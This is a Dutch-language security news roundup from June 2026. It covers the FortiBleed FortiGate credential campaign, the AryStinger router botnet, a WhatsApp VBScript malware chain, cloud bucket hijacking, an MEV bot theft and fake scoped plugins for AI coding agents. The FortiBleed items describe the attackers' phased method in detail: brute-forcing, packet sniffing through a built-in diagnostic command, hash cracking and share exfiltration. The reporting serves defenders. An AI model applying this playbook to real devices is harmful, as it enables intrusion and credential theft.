Volgens de analyse van het bedrijf, gedeeld door Carl Windsor, komt de activiteit niet voort uit een nieuwe kwetsbaarheid, maar exploiteert deze eerder bekendgemaakte beveiligingslekken in combinatie met slechte wachtwoordhygiëne en het ontbreken van multi-factor authenticatie (MFA). De "FortiBleed"-campagne treft naar verluidt tot 86.000 via internet toegankelijke FortiGate firewalls en VPN-appliances in 194 landen, wat het tot een van de meest significante beveiligingsincidenten van Fortinet tot nu toe maakt.

Fortinet's onderzoek wijst uit dat dreigingsactoren inloggegevens hergebruiken van twee eerder gedocumenteerde incidenten – getraceerd als FG-IR-26-060 en FG-IR-25-647. Deze gegevens worden gekoppeld aan met kunstmatige intelligentie versnelde brute-force technieken tegen via internet toegankelijke FortiGate-apparaten die geen sterke inloggegevenscontroles hebben. Fortinet benadrukte dat deze campagne losstaat van recente kwetsbaarheidsmeldingen en dat klanten die de herstelstappen van eerdere adviezen hebben voltooid, niet getroffen zouden moeten worden.

Het bedrijf heeft proactief potentieel gecompromitteerde systemen geïdentificeerd en neemt rechtstreeks contact op met de getroffen klanten, terwijl het ook coördineert met relevante overheidsinstanties. De primaire aanvalsvector omvat zwakke of hergebruikte administratieve en VPN-inloggegevens op via internet toegankelijke FortiGate-appliances, versterkt door de afwezigheid van MFA.

Zodra dreigingsactoren toegang krijgen, omvat het waargenomen gedrag na exploitatie ongeautoriseerde configuratiewijzigingen, aanmaak van kwaadaardige accounts (voorbeelden zijn gebruikersnamen zoals "forticloud", "fortiuser", "fortinet-support" en "fortinet-tech-support"), en potentiële laterale verplaatsing binnen interne netwerken, met name via Active Directory of LDAP-geïntegreerde omgevingen. CISA heeft een dringende waarschuwing uitgegeven aan organisaties om hun Fortinet-apparaten te beveiligen na meldingen van deze grootschalige campagne voor blootstelling van inloggegevens.

Fortinet dringt er bij alle FortiGate-klanten op aan om onmiddellijk de volgende acties te ondernemen:

Alle beheerders- en VPN-sessies beëindigen en onmiddellijk alle Fortinet VPN- en administratieve inloggegevens resetten, met name op via internet toegankelijke systemen.

MFA afdwingen voor alle beheerders- en VPN-gebruikersaccounts.

FortiOS upgraden naar versies 7.4, 7.6 of 8.0, die PBKDF2-hashing ondersteunen voor beheerdersinloggegevens; verwijder verouderde wachtwoordinstellingen met behulp van `set login-lockout-upon-weaker-encryption`.

Configuraties controleren aan de hand van een bekende goede basislijn, met speciale aandacht voor ongeautoriseerde accounttoevoegingen of beleidswijzigingen.

Logs controleren op onverwachte administratieve toegang vanaf onbekende IP-adressen en domeincontroller-logs monitoren op tekenen van laterale verplaatsing of verdachte accountactiviteit.

Beheerstoegang beperken door deze te limiteren tot vertrouwde hosts, lokale in-beleidsregels toe te passen of het via internet toegankelijke beheer volledig te verwijderen.

Organisaties die ongeautoriseerde configuratiewijzigingen, onbekende VPN-gebruikers of onverwachte wachtwoordresets ontdekken, moeten hun apparaten als volledig gecompromitteerd beschouwen. Fortinet beveelt aan om de gepubliceerde richtlijnen voor incidentherstel te volgen en, indien AD/LDAP-integratie aanwezig is, die accounts als gecompromitteerd te behandelen en de directory te monitoren op afwijkende authenticatie of nieuwe accountaanmaak. Voor organisaties die interne netwerkcompromittering vermoeden, staat het FortiGuard Incident Response-team van Fortinet beschikbaar voor scoping-opdrachten.

De afhankelijkheid van de campagne van eerder blootgestelde inloggegevens in plaats van nieuwe exploits benadrukt het cruciale belang van het onmiddellijk voltooien van door de leverancier uitgegeven herstelstappen en het afdwingen van consistente MFA- en sterke wachtwoordbeleidsregels voor alle administratieve interfaces.

 

Bron: Fortinet

22 juni 2026 | AryStinger botnet infecteert duizenden D-Link routers wereldwijd

Onderzoekers van het Qianxin XLab dreigingsinformatie team hebben een voorheen ongedocumenteerd botnet genaamd AryStinger ontdekt. Dit botnet heeft wereldwijd meer dan 4.000 verouderde D-Link routers gecompromitteerd, voornamelijk de modellen DIR-850L en DIR-818LW, om deze om te zetten in proxies voor kwaadaardig verkeer. De geïnfecteerde apparaten worden door de malware gebruikt als op afstand bestuurbare "executors" voor activiteiten zoals scannen, proxying, tunneling en het uitvoeren van commando's.

Het ontwerp van AryStinger stelt aanvallers in staat om grote scan taken op te splitsen in kleinere delen en deze te distribueren over verschillende gecompromitteerde routers. Dit maakt een efficiënte uitvoering van "footprinting" activiteiten mogelijk, wat de voorbereiding voor verdere inbraakoperaties aanzienlijk verbetert. Naast het gebruik van routers als springplank voor kwaadaardige operaties, waarschuwt XLab dat de malware ook de DNS-instellingen kan manipuleren. Dit resulteert in het kapen van het browsegedrag van gebruikers en het stilzwijgend monitoren en potentieel stelen van al het inkomende en uitgaande netwerkverkeer.

AryStinger exploiteert oudere kwetsbaarheden, waaronder CVE-2013-3307, CVE-2016-5681 en CVE-2025-11837. Dezelfde router modellen waren eerder al het doelwit van het AVrecon malware botnet, dat in 2023 werd ontregeld door Lumen communicatiediensten. De telemetrie gegevens van Qianxin tonen aan dat bijna de helft van alle infecties zich in Zuid-Korea bevindt (48,5%), gevolgd door China (31,8%), Zweden (6,4%), Maleisië (3,5%) en Singapore (2,5%).

De onderzoekers hebben twee varianten van de AryStinger malware geïdentificeerd: een C-gebaseerde versie die zich voornamelijk richt op verouderde routers, en een Go-gebaseerde versie die zich richt op NAS-systemen, zij het met een momenteel beperkter bereik. De NAS-versie is geavanceerder en biedt extra functionaliteiten zoals IP- en DNS-scanning, commando-uitvoering, payload-uitvoering en interne netwerkverkenning, door de integratie van open-source penetratietest tools. Hoewel de onderzoekers geen waarnemingen deden van DNS aanvallen, zou de gedistribueerde DNS-scanning infrastructuur van AryStinger potentieel kunnen worden ingezet om grote volumes DNS-query's tegen resolvers te genereren.

Wat betreft de code-uitvoeringsmogelijkheden van de NAS-versie, ondersteunt AryStinger Shell commando's, evenals Go, Java en Python broncode. Er zijn echter beperkingen aan het gebruik van broncode in plaats van gecompileerde binaire bestanden, aangezien compilatie taal runtimes op de host vereist en het proces als geheel ruis introduceert die de stealth kan doorbreken. De onderzoekers hebben AryStinger niet toegeschreven aan een bekende activiteitscluster en stellen dat "veel mysteries rond AryStinger nog moeten worden opgelost."

Eigenaren van routers die het einde van hun levensduur (EoL) hebben bereikt, wordt geadviseerd deze te vervangen door nieuwe, actief ondersteunde modellen, de nieuwste beschikbare firmware updates toe te passen, het standaard beheerderswachtwoord te wijzigen en externe beheerpanelen uit te schakelen.

 

Bron: XLab | Bron 2: supportannouncement.us.dlin... | Bron 3: hubs.li

23 juni 2026 | OpenAI versterkt cyberverdediging met GPT-5.5-Cyber

OpenAI heeft een verbeterde versie van zijn GPT-5.5-Cyber model gelanceerd als onderdeel van het Daybreak-initiatief. Dit model is specifiek ontworpen om beveiligingsprofessionals te ondersteunen bij het opsporen en verhelpen van softwarekwetsbaarheden. OpenAI noemt GPT-5.5-Cyber het "sterkste model tot nu toe" voor deze taken, in staat tot diepgaande analyse van grote codebases om beveiligingsproblemen te identificeren, deze in een gecontroleerde omgeving te valideren, en vervolgens patches te ontwikkelen en te testen.

Gelijktijdig met de lancering van het model brengt de AI-onderneming een update uit voor de Codex Security plugin. Deze plugin moet het proces van het ontdekken en patchen van kwetsbaarheden in bestaande systemen versnellen en tegelijkertijd voorkomen dat nieuwe beveiligingslekken in productiecode terechtkomen. Ontwikkelaars kunnen met de plugin diepe scans uitvoeren, recente wijzigingen beoordelen, rapporten genereren met informatie over ernst, getroffen codelocaties, validatiebewijs en advies voor herstel. Verder biedt de plugin de mogelijkheid om aanvalspaden te traceren, dreigingsmodellen te bouwen, bevindingen te valideren en codebase-specifieke patches te genereren voor beoordeling. De Codex Security plugin kan ook bestaande bevindingen van scanners, advisories, bugbounty-rapporten of ticketing systemen triageren en valideren, waarna het op schaal patchgeneratie faciliteert om een achterstand aan kwetsbaarheden snel weg te werken.

Naast deze ontwikkelingen lanceert OpenAI in samenwerking met Trail of Bits een nieuw initiatief genaamd "Patch the Planet". Dit initiatief richt zich op het beveiligen van open source projecten. De eerste deelnemers aan dit programma zijn onder andere cURL, NATS Server, pyca/cryptography, Sigstore, aiohttp, het Go project, freenginx, Python en python.org.

Deze stappen komen op een moment dat geavanceerde AI modellen van bedrijven zoals Anthropic en OpenAI de ontdekking van kwetsbaarheden versnellen. Dit leidt ertoe dat software maintainers overweldigd raken door een toenemend aantal bugs dat geverifieerd, getrieerd en gepatched moet worden. Waar de uitdaging voorheen lag in het vinden van kwetsbaarheden, ligt het knelpunt nu bij het daadwerkelijk patchen ervan. AI modellen bieden de capaciteit om grote codebases te navigeren, aanvalspaden te beredeneren en beveiligingsproblemen te signaleren die anders verborgen zouden blijven. Een voorbeeld hiervan is een 29 jaar oud lek in de Squid webproxy (CVE-2026-47729, ook bekend als Squidbleed) dat onder bepaalde omstandigheden ongecodeerde HTTP-verzoeken van andere gebruikers kan lekken.

Cyberbeveiligingsexperts uiten echter ook hun bezorgdheid dat geavanceerdere AI modellen de capaciteiten van kwaadwillende actoren vergroten om misbruik te maken van beveiligingslekken. Dit dwingt de industrie om gaten bijna direct na ontdekking te dichten. Het Canadees Centrum voor Cyber Security waarschuwde in mei 2026 dat "organisaties ervan uit moeten gaan dat door AI gedreven exploitatie preventieve controles kan omzeilen, de capaciteit van leveranciers om corrigerende maatregelen te publiceren aanzienlijk kan overtreffen en de implementatiecapaciteit van de organisatie kan uitdagen."

"Patch the Planet" heeft als doel deze buitensporige last voor maintainers te verminderen door security engineers te laten samenwerken met projecten om patches en tests te ontwikkelen, bevindingen te beoordelen en herbruikbare workflows voor kwetsbaarheidsdetectie op te bouwen. OpenAI benadrukt dat het Daybreak-initiatief al een aantal kwetsbaarheden aan het licht heeft gebracht in diverse besturingssystemen en webbrowsers, waaronder:

*   Acht kernel pointer information leak proofs-of-concept (PoC's) en 24 lokale privilege-escalatie-exploits in de Linux Kernel.

*   Een 23 jaar oude use-after-free kwetsbaarheid in OpenBSD's kernelimplementatie van System V semaphores.

*   34 kwetsbaarheden en 7 lokale privilege-escalatie-PoC's in FreeBSD.

*   Zes kwetsbaarheden in dnsmasq (CVE-2026-4890, CVE-2026-4891, CVE-2026-4892 en CVE-2026-5172).

*   Een denial-of-service (DoS)-techniek genaamd "HTTP/2 Bomb" die belangrijke HTTP/2-implementaties treft, waaronder NGINX, Apache, IIS en Pingora.

*   Vijf exploiteerbare kwetsbaarheden in Google Chrome's V8 JavaScript-engine.

*   Tien exploiteerbare Apple Safari kwetsbaarheden.

*   Een WebAssembly-kwetsbaarheid (CVE-2026-8390) in Mozilla Firefox.

De ontwikkelingen van OpenAI lopen parallel met het misbruik van AI door kwaadwillende actoren om de tijd tussen het vinden en exploiteren van een zwakke plek te verkorten, waardoor het venster voor verdedigers om te reageren steeds kleiner wordt. Het gebruik van "vibe-coded exploits" luidt een nieuw hoofdstuk in, waarbij de technologie niet alleen de drempel voor exploitontwikkeling verlaagt, maar aanvallers ook in staat stelt een breed net uit te werpen over nieuw onthulde kwetsbaarheden met minder inspanning. Inlichtingendiensten uit Australië, Canada, Nieuw-Zeeland, het Verenigd Koninkrijk en de Verenigde Staten hebben gewaarschuwd dat geavanceerde AI modellen de snelheid, schaal en geavanceerdheid van cyberdreigingen kunnen versnellen, terwijl de drempel voor kwaadwillende actoren wordt verlaagd en het venster tussen kwetsbaarheidsontdekking en exploitatie nog sneller krimpt. Zij stellen dat deze transformatie niet in jaren, maar in maanden zal plaatsvinden, en benadrukken dat cyberresilience integraal is voor bedrijfscontinuïteit, marktvertrouwen en lange termijn waarde.

 

Bron: OpenAI | Bron 2: gist.github.com | Bron 3: blog.trailofbits.com

23 juni 2026 | Hackers misbruiken FortiGate firewalls als password collectors met FortigateSniffer

Een financieel gemotiveerde dreigingsactor heeft een op maat gemaakt Golang-gebaseerd hulpmiddel, FortigateSniffer genaamd, ingezet op meer dan 430.000 FortiGate firewalls wereldwijd. Sinds februari 2026 heeft dit hulpmiddel geruisloos meer dan 110 miljoen inloggegevens verzameld, waaronder bevestigde data-exfiltratie van een met de NAVO gelieerde defensieaannemer.

De campagne, aangeduid als FortiBleed en onderzocht door SOCRadar's Threat Research Unit (STRU), vertegenwoordigt een van de meest uitgebreide credential-harvesting operaties die ooit zijn gedocumenteerd tegen netwerkperimeterapparaten. De dreigingsactor, vermoedelijk een Initial Access Broker (IAB) met financiële motieven, was continu actief tot half juni 2026 en voerde 659 afzonderlijke harvest-cycli uit met infrastructuur die ten tijde van schrijven nog gedeeltelijk actief is. De gebruikte tooling bevat opmerkingen in het Cyrillische alfabet, wat duidt op een mogelijke Russische oorsprong en potentiële banden met ransomware groepen of door de staat gesponsorde actoren. CISA heeft een dringende waarschuwing uitgegeven waarin organisaties worden geadviseerd hun Fortinet-apparaten te beveiligen na meldingen van een grootschalige blootstelling van inloggegevens.

De kern van de aanval is FortigateSniffer (ook getraceerd als fg_sniffer), een Golang-gebaseerd hulpmiddel dat is gecompileerd voor zowel Linux (fg_sniffer_linux_amd64) als Windows (fg_sniffer_windows_amd64.exe). De gehele interface van de tool is in het Russisch. In plaats van malware in te zetten, misbruikt de tool het ingebouwde diagnostische commando `diagnose sniffer packet` van FortiOS om passief al het authenticatieverkeer te onderscheppen dat een gecompromitteerde firewall passeert. Dit omvat 24 protocollen, waaronder RADIUS, NTLM, Kerberos, LDAP, RDP, SMB, MSSQL, FTP, Telnet en WinRM.

Zodra het verkeer is gesniffd, wordt de ruwe SSH terminal output door de SNIFTRAN engine geconverteerd naar het .pcapng formaat. Vervolgens wordt dit verwerkt door een PCAP Deep Analysis Toolkit (v5.0) die cleartext inloggegevens, NTLMv2 hashes, Kerberos TGS/ASREP tickets en sessiecookies extraheert. De tool omvat ook twee ontwijkingstechnieken: GeoIP-gebaseerde filtering (met behulp van een binair-zoek-geoptimaliseerd ipgeo.csv) en business-hour scheduling, waarbij actief sniffen wordt beperkt tot 07:00-18:00 Moskou-tijd om afwijkende waarschuwingen buiten kantooruren te minimaliseren.

De operatie volgt een methodische levenscyclus van vijf fasen. Fase 1, Reconnaissance & Credential Sourcing, omvatte het gebruik van Masscan voor brede poortscans, Shodan_Recon voor passieve verrijking via SSL/certificaatmetadata, en FortiProbe-fast om doelen te classificeren in FortiGate/niet-FortiGate/dood. Aangepaste scripts (match_corps.py, merge_revenue.py, build_report.py) rangschikten vervolgens de doelen op bedrijfswinst voordat enige exploitatie begon, wat een doelbewuste, economisch gestuurde targeting weerspiegelt.

In Fase 2, Pairing & Initial Access, genereerde de tool gen_rotator Cartesian product combo-bestanden van hosts en inloggegevens. Deze werden gebruikt door mpbrute2.bin voor SSH brute-force aanvallen tegen FortiGate admin accounts met behulp van 16 productspecifieke woordenlijsten, en door forticheck (tot 25.000 threads) voor SSLVPN portaal credential stuffing.

Fase 3, Sniffer Deployment & Harvesting, bestond uit het inloggen op elke gecompromitteerde FortiGate met geldige SSH inloggegevens en het injecteren van FortigateSniffer, waardoor het apparaat een passieve luisteraar werd. Er werden 6.127 apparaten geladen in de waargenomen deployments, met een SSH validatie succespercentage van 90%. Tegen het einde van de operatie bevatte ssh.txt 237.330 werkende FortiGate SSH inloggegevens.

Fase 4, Cracking & Lateral Movement, omvatte het kraken van geoogste hashes (NTLM, Kerberos, RADIUS) via een door Hashtopolis beheerd Hashcat GPU cluster, aangevuld met dynamisch gehuurde capaciteit van vast.ai. Dit werd georkestreerd via een speciale Telegram bot die dynamisch één tot zes GPU's toewees en live kraaktelemetrie leverde. Lateral movement tools, waaronder spray_da.py, smb_test.py, spider.py en ad_full_audit.py, bewogen zich vervolgens door Active Directory omgevingen.

De laatste fase, Exfiltratie, maakte gebruik van backup_dfs.py om DFS shares via SMB recursief volledig te extraheren en deze direct naar de SSH servers van de aanvaller te streamen zonder lokale staging. Op 15 juni 2026, na offline cracking van 172 Kerberos RC4 hashes, voerde de actor een gerichte DFS backup exfiltratie uit tegen een met de NAVO gelieerde defensieaannemer.

De campagne heeft volgens SOCRadar's Threat Research Unit 23.406 unieke domeinen blootgesteld op 80.553 FortiGate apparaten. 66% van de slachtoffers heeft minder dan 200 werknemers, waarbij het bereik van 51-200 werknemers goed is voor 42,3% van alle getroffen domeinen. Dit zijn organisaties die groot genoeg zijn om FortiGate te implementeren, maar doorgaans geen speciale beveiligingsoperaties hebben. IT-diensten vormen de dominante sector (8,4% van de slachtoffers), een bewuste keuze om maximale downstream toegang tot klantomgevingen te maximaliseren. India (11,4%) en de Verenigde Staten (10,1%) voeren de geografische distributie aan, gevolgd door Taiwan, Mexico en Turkije. De campagne is midden juni 2026 nog steeds actief, met sniffer operaties en harvest resultaten directories die continu worden bijgewerkt.

 

Bron: CISA

23 juni 2026 | WhatsApp phishingcampagne infecteert pc's met legitieme RMM-tool

Een aanhoudende malwarecampagne richt zich op gebruikers van WhatsApp in diverse landen met misleidende berichten die kwaadaardige VBScript-bestanden verspreiden, wat leidt tot toegang op afstand tot de systemen van slachtoffers. De dreigingsactor maakt gebruik van gecompromitteerde accounts van contacten van het slachtoffer en stuurt bestanden met namen die duiden op zakelijke en financiële documenten. Door deze kwaadaardige bijlagen te downloaden en uit te voeren, start de ontvanger een infectieketen die resulteert in de installatie van het legitieme programma ManageEngine Endpoint Central, een tool die door IT-beheerders wordt gebruikt voor het centraal beheren van systemen.

Telemetrische gegevens van cybersecuritybedrijf Kaspersky tonen aan dat de campagne zich heeft verspreid over Brazilië, India, Mexico, Singapore, het Verenigd Koninkrijk, Spanje, Taiwan, Australië, Rusland, Vietnam en Maleisië. De aanvallen beginnen met berichten die vanuit gecompromitteerde accounts worden verstuurd en die een sterk versluierd VBS-bestand bevatten. Deze bestanden krijgen namen die ze doen lijken op financiële rapporten, factuurafschriften of accountmeldingen, om zo de aandacht van het doelwit te trekken en hen aan te zetten tot het openen van het bestand. De bestandsnamen zijn ook gelokaliseerd in meerdere talen, wat de wereldwijde reikwijdte van de campagne verder bevestigt.

Kaspersky legt uit: "Gebaseerd op bewijs verzameld van meerdere slachtoffers via socialemediaberichten en ingediende samples, kunnen we concluderen dat de dreigingsactor toegang had verkregen tot verschillende WhatsApp-accounts en deze gebruikte om de kwaadaardige VBScript-bestanden te verspreiden onder contacten van de gecompromitteerde gebruikers." De exacte methode die is gebruikt om deze WhatsApp-accounts te compromitteren, blijft op dit moment onbekend.

Als het slachtoffer het bestand downloadt en opent op Windows, haalt het VBScript twee extra scripts op uit de infrastructuur van de aanvaller. Deze scripts schakelen vervolgens UAC-beveiligingen uit door aanpassingen aan de Registry en downloaden een ZIP-archief met daarin het programma ManageEngine Endpoint Central. Deze software wordt stil op de achtergrond geïnstalleerd en geconfigureerd om verbinding te maken met door de aanvaller gecontroleerde beheerservers, waardoor zij toegang op afstand krijgen voor beheer op de computer van het slachtoffer. Kaspersky merkt op dat wanneer het initiële VBScript-bestand via WhatsApp Web wordt geleverd, het eerst moet worden gedownload. Echter, wanneer het in de desktopclient van WhatsApp wordt geopend, kan het direct worden uitgevoerd via Windows Script Host (wscript.exe).

Hoewel Kaspersky de aanvallen niet toeschrijft aan een specifieke dreigingsactor, vonden de onderzoekers aanwijzingen voor het gebruik van de Chinese taal en een overlap in infrastructuur met IP-adressen die eerder werden geassocieerd met activiteit van ValleyRAT en Gh0st RAT. Desondanks is er onvoldoende bewijs voor een toeschrijving met hoge mate van zekerheid. Gebruikers van WhatsApp wordt geadviseerd om bestanden die door contacten worden verzonden, zelfs vertrouwde contacten, met voorzichtigheid te behandelen en deze altijd via secundaire middelen te verifiëren. Alle gedownloade bestanden moeten worden gescand met een up-to-date antivirusprogramma voordat ze worden uitgevoerd.

 

Bron: Kaspersky | Bron 2: securelist.com | Bron 3: hubs.li

23 juni 2026 | Nieuwe 'bucket hijacking' techniek bedreigt cloud data exfiltratie bij grote providers

Onderzoekers van Unit 42, het dreigingsonderzoekscentrum van Palo Alto Networks, hebben een innovatieve 'bucket hijacking' techniek geïdentificeerd die meerdere diensten binnen grote cloud service providers (CSPs) treft. Deze aanvalsmethode maakt misbruik van een fundamentele architectonische kwetsbaarheid die aanwezig is bij diverse cloudproviders en potentieel ook andere providers kan beïnvloeden. De bevindingen zijn gepubliceerd door Yahav Festinger op 22 juni 2026.

De techniek stelt een aanvaller in staat om ongemerkt actieve datastromen van een organisatie te compromitteren door gegevens om te leiden naar een externe opslagbucket die onder controle van de aanvaller staat. Dit is mogelijk doordat de naam van een opslagbucket wereldwijd uniek is. Een aanvaller kan een bestaande bucket eenvoudigweg verwijderen en vervolgens onder zijn eigen account opnieuw aanmaken met exact dezelfde naam. Dit creëert een zogenaamd 'global namespace risk'.

Door deze manipulatie kunnen cruciale logboeken en gevoelige data direct worden omgeleid naar de omgeving van de aanvaller, waardoor data-exfiltratie plaatsvindt zonder dat de getroffen organisatie dit direct merkt. Unit 42 heeft deze ontdekkingen gedeeld met Google Cloud, Amazon Web Services (AWS) en Microsoft Azure, de cloud service providers die door dit architectonische gebrek worden geraakt.

Hoewel er tot op heden geen concrete gevallen zijn vastgesteld waarbij een dreigingsactor deze specifieke aanvalstechniek in de praktijk heeft toegepast, adviseren de onderzoekers organisaties om proactief maatregelen te nemen. Dit is met name belangrijk omdat reële pogingen om deze techniek te benutten naar verwachting moeilijk te detecteren zullen zijn. De aanvalsmethode betreft een verfijnde vorm van privilege-escalatie en data-exfiltratie die een ernstige bedreiging vormt voor de integriteit van cloudgebaseerde datastromen.

 

Bron: Unit 42 | Bron 2: mastodon.social | Bron 3: paloaltonetworks.com

23 juni 2026 | Ethereum MEV bot 'JaredFromSubway' gehackt voor $15 miljoen

De JaredFromSubway Ethereum MEV (Maximal Extractable Value) bot heeft een verlies van $15 miljoen geleden als gevolg van een geavanceerde cyberaanval. Een aanvaller wist de logica voor het detecteren van handelsmogelijkheden te manipuleren door valse cryptocurrency handelsmogelijkheden te creëren. De diefstal werd zaterdag gedetecteerd door blockchain beveiligingsfirma Blockaid. JaredFromSubway bevestigde maandag dat de aanvaller gebruikmaakte van nep pools en tokens om de bot te misleiden tot het goedkeuren van helpercontracten.

Volgens Blockaid implementeerde de aanvaller contracten die ontworpen waren om winstgevende MEV-kansen te simuleren voor het geautomatiseerde uitvoeringssysteem van JaredFromSubway. De bot analyseerde automatisch routes en handelsmogelijkheden die financieel aantrekkelijk leken. Vervolgens genereerde de bot de transacties die nodig waren om deze uit te voeren, waarbij ERC-20 token goedkeuringen werden verleend aan contracten die onder controle stonden van de aanvaller.

De aanval lijkt zorgvuldig gepland te zijn. Eerdere transacties dienden als onschadelijke tests om de actieroutines van de bot te bevestigen. Later wijzigde de dreigingsactor de route, zodat de toegekende machtiging niet werd verbruikt of ingetrokken nadat de bot de goedkeuringen had verleend. Op deze manier kon de aanvaller geldige bestedingsrechten accumuleren zonder deze onmiddellijk te gebruiken. Uiteindelijk werden er zo 92.1614 WETH goedgekeurd aan een door de aanvaller gecontroleerd helpercontract. Met deze openstaande goedkeuringen trok de aanvaller vervolgens WETH, USDC en USDT terug uit het JaredFromSubway MEV bot contract via de `transferFrom` functie.

MEV bots zijn ultrasnelle geautomatiseerde handelssystemen die Ethereum en andere blockchains scannen op mogelijkheden om geld te verdienen door de volgorde en timing van transacties te manipuleren voordat deze in een block worden opgenomen. JaredFromSubway is een private MEV operatie zonder publiekelijk beschikbare code, en staat bekend als een van Ethereum's meest agressieve en zichtbare "sandwich" bot operaties. Bij een sandwich aanval detecteert de bot een lopende handel van een gebruiker, plaatst onmiddellijk een kooporder ervoor, en verkoopt dan onmiddellijk erna, profiterend van de prijsbeweging die wordt veroorzaakt door de transactie van het slachtoffer. Deze praktijk is controversieel omdat het vaak resulteert in slechtere prijzen voor reguliere handelaren, terwijl het winsten genereert voor de bot operator.

Initiële pogingen om de gestolen fondsen terug te krijgen omvatten een bounty van $3 miljoen van JaredFromSubway aan de aanvaller, met de belofte van geen verdere actie bij volledige teruggave. Toen er geen reactie kwam, verhoogde JaredFromSubway de bounty naar $7,5 miljoen voor de teruggave van slechts 50% van het gestolen bedrag, waarbij $1 miljoen aan de gemeenschap zou worden gegeven. JaredFromSubway is ook in onderhandeling met een "white-hat hacking groep" over de gestolen $15 miljoen, maar er is nog geen bevestiging van een deal.

 

Bron: hubs.li

23 juni 2026 | FortiBleed-campagne gebruikt FortiGate sniffer voor diefstal inloggegevens

De grootschalige FortiBleed-campagne, gericht op Fortinet FortiGate-apparaten, maakt gebruik van op maat gemaakte sniffers om authenticatiegegevens te stelen van gecompromitteerde firewalls. Dit blijkt uit een recent rapport van beveiligingsfirma SOCRadar. De campagne, die sinds ten minste februari 2026 actief is, heeft wereldwijd meer dan 430.000 FortiGate-firewalls als doelwit gehad. Eerder onderzoek van SOCRadar onthulde al een verzameling van Fortinet VPN-inloggegevens, gekoppeld aan meer dan 80.000 firewall-URL's.

De dreigingsactor achter deze campagne opereert als een Initial Access Broker (IAB) en verkrijgt toegang tot bedrijfsnetwerken via methoden zoals credential stuffing, brute force aanvallen, credential harvesting en het offline kraken van wachtwoorden. Een belangrijke bevinding van de onderzoekers is het vermeende gebruik van een op Golang gebaseerde tool genaamd "FortigateSniffer". Deze tool misbruikt de ingebouwde diagnose sniffer packet-functionaliteit van FortiOS om authenticatieverkeer vast te leggen dat door de gecompromitteerde FortiGate-apparaten stroomt.

Volgens SOCRadar is de tool ontworpen om verkeer te monitoren op 24 protocollen en om inloggegevens, wachtwoord-hashes en authenticatiegegevens te extraheren uit netwerkstromen. Specifieke protocollen die worden gemonitord, zijn onder andere RADIUS, NTLM, Kerberos, LDAP, SMB, RDP, WinRM, Microsoft SQL Server, MySQL, PostgreSQL, SMTP, IMAP, POP3, FTP en Telnet.

Nadat de aanvallers administratieve toegang hadden verkregen via credential stuffing en brute force aanvallen, implementeerden zij het credential-harvesting sniffer-framework "FortigateSniffer" op de gecompromitteerde FortiGate-apparaten. Deze tool maakt via SSH verbinding met de FortiGate-apparaten en start het diagnose sniffer packet-commando van FortiOS, een legitiem diagnostisch hulpmiddel dat door beheerders wordt gebruikt voor het oplossen van netwerkproblemen.

De verzamelde pakketdata van de FortiGate-apparaten werd verwerkt door een component genaamd "SNIFTRAN", die het vastgelegde verkeer reconstrueerde tot PCAP-bestanden. Vervolgens analyseerde een op Python gebaseerde "PCAP Deep Analysis Toolkit" de data, waarbij cleartext-inloggegevens, wachtwoord-hashes, Kerberos-tickets, NTLM-authenticatiemateriaal en e-mail- en database-inloggegevens uit het netwerkverkeer werden gehaald. De toolkit genereerde ook Hashcat-compatibele bestanden met NTLM- en Kerberos-hashes.

De dreigingsactoren gebruikten vervolgens de GPU-gebaseerde Hashcat-utility op een gedistribueerde GPU-cluster om de gehashte inloggegevens te kraken. Cybersecurity-expert Kevin Beaumont suggereerde daarnaast dat de aanvallers ook gehashte inloggegevens verkregen door FortiGate-configuratiebestanden van gecompromitteerde apparaten te downloaden. Deze werden gekraakt met Hashcat en 36 enterprise-klasse GPU's die gehuurd werden van een GenAI-bedrijf.

Organisaties die FortiGate-apparaten gebruiken, wordt geadviseerd de door Kevin Beaumont gepubliceerde lijst met getargete IP-adressen te raadplegen en te onderzoeken of hun systemen zijn aangevallen of gecompromitteerd.

 

Bron: Fortinet | Bron 2: socradar.io | Bron 3: doublepulsar.com

23 juni 2026 | Nieuwe supply chain dreiging: 'Scope squatting' misbruikt ClawHub AI-plugins

Onderzoekers hebben een subtiele, maar serieuze supply chain dreiging ontdekt binnen het ecosysteem van AI-agents. Het betreft 23 plugins in het ClawHub-register die zijn gepubliceerd onder officiële organisatorische scopes zonder enige autorisatie van ClawHub of het moederproject, OpenClaw. Deze plugins maakten misbruik van vertrouwde namespace-prefixes om zich voor te doen als legitieme, eigen tools, hoewel ze waren ingediend door ongerelateerde accounts van derden.

ClawHub functioneert als het primaire register voor plugins en vaardigheden voor OpenClaw. Het ondersteunt Claude-compatibele plugin-bundels die kunnen worden geïnstalleerd in AI-codering agents zoals Claude Code, Cursor en Codex. Het register indexeert meer dan 1.500 plugins en maakt gebruik van een scoping-systeem dat vergelijkbaar is met npm, waarbij de `@owner/`-prefix in een pluginnaam aangeeft wie deze heeft gepubliceerd. Het probleem was dat de handhaving van dit vertrouwensmodel door ClawHub inconsistent was, waardoor externe accounts ongehinderd onder gereserveerde organisatorische scopes konden publiceren.

Analisten van Manifold Security identificeerden alle 23 frauduleuze plugins en rapporteerden hun bevindingen in een rapport. De getroffen plugins droegen prefixes zoals `@openclaw/` en `@clawhub/`, dezelfde scopes die ClawHub gebruikt voor zijn eigen legitieme tools zoals `@openclaw/whatsapp` en `@openclaw/codex`. Elke ontwikkelaar die een van deze plugins zou installeren, zou redelijkerwijs aannemen dat deze rechtstreeks van de officiële bron afkomstig was.

Alle 23 gemarkeerde plugins voeren code uit binnen de agent-omgeving. Verschillende plugins voeren acties met hoge privileges uit, waaronder autonome betalingsverwerking, het uitvoeren van git-commando's op hostniveau, het exporteren van agent-configuraties en het verbinden met externe API's. Onder een officieel ogende scope creëren deze mogelijkheden een geloofwaardig supply chain risico dat de meeste ontwikkelaars niet in twijfel zouden trekken.

De tijdlijn na de ontdekking was kort. Manifold rapporteerde het probleem op 17 juni 2026 aan ClawHub via de beveiligingsadviesworkflow van GitHub, gevolgd door een beleefdheids-e-mail de volgende dag. Op 19 juni had ClawHub alle 23 misleidende plugins uit het register verwijderd en een formeel geschilproces toegevoegd voor het melden van ongeautoriseerd namespace-gebruik.

